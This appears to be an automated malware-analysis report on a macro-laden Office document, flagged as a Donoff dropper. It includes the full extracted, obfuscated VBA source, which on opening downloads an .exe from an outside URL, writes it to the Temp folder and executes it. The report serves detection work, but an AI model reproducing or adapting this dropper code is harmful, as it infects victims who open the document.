Verdict: MALICIOUS
Risk Score: 330

Malware Insights

MITRE ATT&CK:
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
- T1059 Command and Scripting Interpreter
The sample is a malicious Office document containing VBA macros. The macros heavily utilize WScript.Shell and CreateObject, indicating an intent to execute arbitrary commands. The presence of 'Doc.Dropper.Donoff-5743530-0' in ClamAV detection further supports its role as a dropper. The obfuscated nature of the VBA code and the lack of specific URLs or executable payloads prevent a more precise family attribution.
Heuristics (10)

- ClamAV: Doc.Dropper.Donoff-5743530-0 [critical] (CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Donoff-5743530-0
- VBA macros detected [medium, 5 related findings] (OLE_VBA_MACROS): Document contains VBA macro code
- WScript.Shell usage [critical] (OLE_VBA_WSCRIPT): WScript.Shell usage. Matched lines in script:
    Dim eWpWEh As Boolean, FxaIym As String
    Set SHXSnRT = CreateObject("WScript.Shell")
    End Function
- CreateObject call [high] (OLE_VBA_CREATEOBJ): CreateObject call. Matched lines in script:
    Dim eWpWEh As Boolean, FxaIym As String
    Set SHXSnRT = CreateObject("WScript.Shell")
    End Function
- CallByName call [high] (OLE_VBA_CALLBYNAME): CallByName call. Matched lines in script:
    Public Sub UKejTxQEbq(ByVal sYjWsiUzz As Integer, ByVal vOOXhIoYVI As Object, ByVal ScJkfRq As String)
    CallByName vOOXhIoYVI, ScJkfRq, 1
    End Sub
- VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Document_Open macro [low] (OLE_VBA_DOCOPEN): Document_Open macro. Matched lines in script:
    End Sub
    Private Sub Document_Open()
    Dim YnwozAvBvp As Boolean
- Reference to Windows Script Host [high] (SC_STR_WSCRIPT): Reference to Windows Script Host
- Suspicious extracted artifact [medium] (EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info] (EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
    - http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
    - http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
    - http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
    - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8735 bytes |

SHA-256: f877c7208b7ffe3a98aaec958355775c4ffa5c773e6aa9b08082a9291d47e38a

Detection (ClamAV): No threats found

Obfuscation or payload: likely. 141 of 223 identifiers look randomly generated (e.g. 'ReXsGOpoqnOsOeqBGOoqdyG'), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub BfTPqWs(ByVal gIufA As String, ByVal LacFrq As String)
wHTiRT
If mjspzU(9002, 675, "bKN") Then
jGxNa True, "6EfP", "TYl"
QwNZHX
tmRfIVJh 807
End If
End Sub
Private Sub qrFHup(ByVal NpYBFBTzJV As Integer)
YoQROe 280, "", 3880
nSBNYIEqi
szgGkotf 3197, "i5GxS", True
End Sub
Private Sub Document_Open()
Dim YnwozAvBvp As Boolean
BNcHSGIJf.ZtMEX
End Sub
Private Sub nQCIq()
mqxGfUKgzi 6499, "0n", "0tZ"
MmaltzrlX 1715
If hBTkqIt("8Z") Then
rRoMb
Else
yqyGeqxn
End If
End Sub
Private Function wltuwyHn() As String
yhlAeROGu
wltuwyHn = "cD9E0"
End Function
Attribute VB_Name = "BNcHSGIJf"
Private Function OoEhMR(ByVal IjOsYr As String, ByVal TSFvPrL As String) As String
Dim AcxihNg As Integer
Set QskLZ = gKboyvolPW.onTdFDT(xPlhhpH, HFeAw.SHXSnRT, nXpSrndefO.nSbtX("P3RAWOVCVES3VS", ".A3VW"))
OoEhMR = QskLZ(IjOsYr)
End Function
Private Function YWCQbqQv() As String
YWCQbqQv = nXpSrndefO.nSbtX("OYp4eCnC", "CY4 ")
End Function
Private Function xPlhhpH() As String
xPlhhpH = nXpSrndefO.nSbtX("E8nYYvGirbYoGnbm8eBnGt", "8bBGYX")
End Function
Private Function QHdHkw() As String
QHdHkw = ""
End Function
Private Sub sxrYjwcZt(ByVal eFqbNX As String, ByVal IRYwspeX As String)
Set fcZJtgcx = HFeAw.icTvlKd
gKboyvolPW.TwbrZBW GVNMSNRg, nXpSrndefO.nSbtX("OYp4eCnC", "CY4 "), eFqbNX, fcZJtgcx, False
gKboyvolPW.fFqjHYA nXpSrndefO.nSbtX("UJsJJerj-JJAjgJeJnGt", "GJj"), IOqJAN, 2963, nXpSrndefO.nSbtX("Mv5ovzviluvl5av/45v.0uv 5(cvvomv5pautuiuvbvle5;5u)", "5uv"), PhmNCS, fcZJtgcx
gKboyvolPW.UKejTxQEbq 1177, fcZJtgcx, mXKRQdOau
ZnkGjY True, 6317, IRYwspeX, gKboyvolPW.KYKlnqZg(PhmNCS, vOCyopiJ, fcZJtgcx)
End Sub
Private Function vOCyopiJ() As String
vOCyopiJ = nXpSrndefO.nSbtX(".ReXsGOpoqnOsOeqBGOoqdyG", ".GXqO")
End Function
Private Sub hHUoZB()
Dim POgVyR As Integer
OIRUtHf = True
On Error GoTo OrzQWZ
zIxdob = False
sxrYjwcZt buIGdYS, npxWtFU
kaoTXVXkN npxWtFU
Exit Sub
OrzQWZ:
End Sub
Private Function npxWtFU() As String
Dim KubjUDj As Integer, hIKrUpMu As Integer
npxWtFU = OoEhMR(nXpSrndefO.nSbtX("ZTEUMZsP", "9cZUsX"), "Y1v") & zXknZ
End Function
Private Function IusMN() As String
IusMN = nXpSrndefO.nSbtX("nTyHpaeB", "HBaqXn")
End Function
Private Function zXknZ() As String
Dim KfyJzS As Integer
Dim AHkxT As Integer
JJNlxuFaS = True
zXknZ = bTDZVlILY
End Function
Private Sub kaoTXVXkN(ByVal TZgTSAD As String)
gKboyvolPW.ErXEws "jMid", HFeAw.SHXSnRT, 7188, TZgTSAD, nXpSrndefO.nSbtX("kEx2eI1c", "k31IG2")
End Sub
Private Function PhmNCS() As String
PhmNCS = "p9rRo"
End Function
Public Sub ZtMEX()
Dim NaNnhcwVfC As Integer
Dim kHPhC As Boolean
kZsag = 4121
hHUoZB
End Sub
Private Function mQNhWUO() As String
mQNhWUO = nXpSrndefO.nSbtX("YClm/o/s0e", "0dY/m")
End Function
Private Function buIGdYS() As String
Dim XEwEOMUzxV As Integer
buIGdYS = nXpSrndefO.nSbtX("hBtYUtpYU:Y//YmYaYBgUaBzYinUBesYeUYmUprUeYbBeYlUlBUaU.cYoBYmB/UsBysUtYeUmUY/BcUacBhBeUY/UwoBrUUdY.eYYxUe", "YUB")
End Function
Private Sub ZnkGjY(ByVal uCxjt As Boolean, ByVal tVohFulJeC As Integer, ByVal lpiZGvB As String, ByVal BbwKFO As Variant)
Dim uGsiyUgO As Boolean
Dim LwOWyH As Integer
Set mvsPNLlAV = HFeAw.TAjwX
gKboyvolPW.WhuHkLtpyX True, 1, mvsPNLlAV, IusMN
gKboyvolPW.UKejTxQEbq 1177, mvsPNLlAV, YWCQbqQv
uRUxACPwrk = 5904
gKboyvolPW.ErXEws QHdHkw, mvsPNLlAV, 7188, BbwKFO, nXpSrndefO.nSbtX("Wbbribtzek", "Zzlmkb")
sIbLjqP = "5LP"
gKboyvolPW.fFqjHYA lpiZGvB, FuSmp, 2963, 2, QHdHkw, mvsPNLlAV
gKboyvolPW.UKejTxQEbq 1177, mvsPNLlAV, mQNhWUO
End Sub
Private Function GVNMSNRg() As String
XBoKEL = False
GVNMSNRg = nXpSrndefO.nSbtX("G.E TB", ".BA ")
End Function
Private Function FuSmp() As String
FuSmp = nXpSrndefO.nSbtX("pSraUvremToVUFimlVed", "mprdUV")
End Function
Private Function bTDZVlILY() As String
bTDZVlILY = nXpSrndefO.nSbtX("/76owfbV879w4eo1o8w027fw14Vb5V7a41o.VeoxeV", "V7wo4")
End Function
Private Function IOqJAN() As String
IOqJAN = nXpSrndefO.nSbtX("SEehtELReLlqhuelshhtLHhepaldlelr", "ELlhp")
End Function
Private Function mXKRQdOau() As String
mXKRQdOau = nXpSrndefO.nSbtX("SIerIndr", "MIrG")
End Function
Attribute VB_Name = "dTAeVqABM"
Public Function BdNwvMEm(ByVal aqCHoQvtC As Integer, ByVal KlGnT As Integer, ByVal RuqFRkGeTO As String, ByVal soLVa As String) As String
Dim DnFYLNxTK As Integer, PsDspeSF As Integer
BdNwvMEm = Mid(soLVa, aqCHoQvtC, 1)
End Function
Private Sub IAoav(ByVal vVtILlPA As Integer, ByVal JHjgfI As String)
BkMTwPAnUV "VD0OE", 5936
vVjYXg 5637
If LYvcZvEUHc Then
ZkAFSHcy
RYUrsdm True
aVgAUZYDE 8658, "uMSef", "ZfL4"
End If
nnWkkdeYWI "wQm", "ha3TL", False
tvremm "1fm", "33tj", True
End Sub
Public Function XBiHiIn(ByVal cRDaHNs As Integer, ByVal bVQyokwEy As Boolean, ByVal MTCzGK As String, ByVal zVHZvPgjgN As String) As String
XBiHiIn = zVHZvPgjgN & MTCzGK
End Function
Public Function ZJYkChuWI(ByVal HSKnWCRwr As String, ByVal ZDyiWkTAd As String) As Boolean
Dim hFaLpRS As Integer
ZJYkChuWI = InStr(1, ZDyiWkTAd, HSKnWCRwr)
End Function
Attribute VB_Name = "gKboyvolPW"
Private Sub lByTFHW(ByVal vuMKfoi As Boolean, ByVal ClGUTh As Integer)
QzYClH "TVeg", 8941, "ICWP"
End Sub
Public Sub UKejTxQEbq(ByVal sYjWsiUzz As Integer, ByVal vOOXhIoYVI As Object, ByVal ScJkfRq As String)
CallByName vOOXhIoYVI, ScJkfRq, 1
End Sub
Public Sub TwbrZBW(ByVal GdzeebdNzs As Variant, ByVal DXtzZg As String, ByVal LgruZrTJG As Variant, ByVal sLzTj As Object, ByVal qeXTseW As Variant)
IXNhTW = "Rqwh"
CallByName sLzTj, DXtzZg, 1, GdzeebdNzs, LgruZrTJG, qeXTseW
End Sub
Public Function onTdFDT(ByVal ZmGwXopgt As String, ByVal tiVdYkR As Object, ByVal bfngxtsGS As String) As Variant
Dim UhdIhRB As Integer, bAmMXC As Integer
Set onTdFDT = CallByName(tiVdYkR, ZmGwXopgt, 2, bfngxtsGS)
End Function
Public Sub fFqjHYA(ByVal HzxwWMPHJ As Variant, ByVal eBvIDtdn As String, ByVal wgcgVdLCl As Integer, ByVal Jhseo As Variant, ByVal ECInQEzoq As String, ByVal sJSenS As Object)
CallByName sJSenS, eBvIDtdn, 1, HzxwWMPHJ, Jhseo
End Sub
Public Sub WhuHkLtpyX(ByVal qeYPVdRNPt As Boolean, ByVal OQhYWAJq As Variant, ByVal EDEBCZhlE As Object, ByVal bUwgEcDH As String)
CallByName EDEBCZhlE, bUwgEcDH, 4, OQhYWAJq
End Sub
Private Sub EIEjGL(ByVal KjscLJ As Integer, ByVal WUjEsQf As Integer)
VYZRTX "GbH"
FaPULoVT 5592, "qLHe", ""
End Sub
Public Sub ErXEws(ByVal cWJNSDLZ As String, ByVal ZjgXY As Object, ByVal fOrgGs As Integer, ByVal zcfBqw As Variant, ByVal TlArMRdxcc As String)
CallByName ZjgXY, TlArMRdxcc, 1, zcfBqw
End Sub
Public Function KYKlnqZg(ByVal FFApARY As String, ByVal fAgoVIBX As String, ByVal eryRj As Object) As Variant
Dim SoKMdE As Integer, UNYDxtaaT As Boolean
KYKlnqZg = CallByName(eryRj, fAgoVIBX, 2)
End Function
Attribute VB_Name = "HFeAw"
Private Sub XAavB(ByVal oSvsL As Boolean, ByVal ISnRzNlTb As Integer)
JdrgwQ
End Sub
Public Function SHXSnRT() As Object
Dim eWpWEh As Boolean, FxaIym As String
Set SHXSnRT = CreateObject("WScript.Shell")
End Function
Public Function icTvlKd() As Object
Set icTvlKd = CreateObject("MSXML2.ServerXMLHTTP.6.0")
End Function
Private Sub lROGqM()
If euVWF Then
EqgCajclK 1379, False, "DQx"
End If
End Sub
Private Sub LxmYPeYh(ByVal ljjuPM As String)
rwKYqDFg True, 2503
End Sub
Public Function TAjwX() As Object
Dim HNxmhVPn As Boolean
Set TAjwX = CreateObject("ADODB.Stream")
End Function
Private Function aCtmY() As Integer
scmBSvpTk 2792
lJSsRbNCDs
jTPYG 698, True
upFcL "oC", "nBiN7", 3231
aCtmY = 5750
End Function
Attribute VB_Name = "nXpSrndefO"
Private Function ExYgxKW(ByVal MKoxnesM As Boolean, ByVal qWOHXqk As String) As Boolean
aAnoEkmH
TYWXT
SIYNpFH
If bIFLsWSDYA Then
sjrIRNel
pIxxnGPm True, 5648
Else
oRDnv
GIOdryBDU
End If
ExYgxKW = False
End Function
Public Function nSbtX(ByVal skTWdDv As String, ByVal bRlqXu As String) As String
Dim neEHTjJk As Boolean
Dim mtIwZjkeA As String
crcNfikH = "hDM8W"
For fhinR = 1 To Len(skTWdDv)
neEHTjJk = dTAeVqABM.ZJYkChuWI(dTAeVqABM.BdNwvMEm(fhinR, 5243, otwBaoF, skTWdDv), bRlqXu)
If Not neEHTjJk Then
nSbtX = dTAeVqABM.XBiHiIn(2102, True, dTAeVqABM.BdNwvMEm(fhinR, 5243, otwBaoF, skTWdDv), nSbtX)
fitPL = ""
End If
Next
End Function
Private Function aqoQarrlH() As Integer
ngHBnhTd 5855, 1524
UimfM
kCujVAMx
If zXmQhJr Then
vMylTY
ROzIu
End If
aqoQarrlH = 5758
End Function
Private Function otwBaoF() As String
otwBaoF = "ernX9"
End Function